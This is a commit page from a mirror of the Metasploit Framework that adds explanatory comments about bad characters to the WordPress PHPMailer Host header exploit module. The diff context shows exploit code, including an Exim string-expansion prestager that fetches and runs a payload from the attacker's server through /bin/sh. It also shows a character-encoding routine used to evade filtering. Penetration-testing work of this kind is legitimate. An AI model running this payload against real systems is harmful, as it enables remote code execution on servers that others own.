infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add some comments about badchars

bug/bundler_fix
William Vu 2017-05-10 00:30:43 -05:00
parent ecb79f2f85
commit 8842764d95
1 changed files with 3 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
View File

@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
return
end
# Since everything goes through strtolower(), we need lowercase
print_status("Generating #{cmdstager_flavor} command stager")
@cmdstager = generate_cmdstager(
'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
@ -99,6 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
prestager = []
# This is basically sh -c `wget` implemented using Exim string expansions
# Badchars we can't encode away: \ for \n (newline) and : outside strings
prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
'{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
"{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
@ -132,6 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
end
# We can encode away the following badchars using string expansions
def encode_exim_payload(command)
command.gsub(/[\/ :]/,
'/' => '${substr{0}{1}{$spool_directory}}',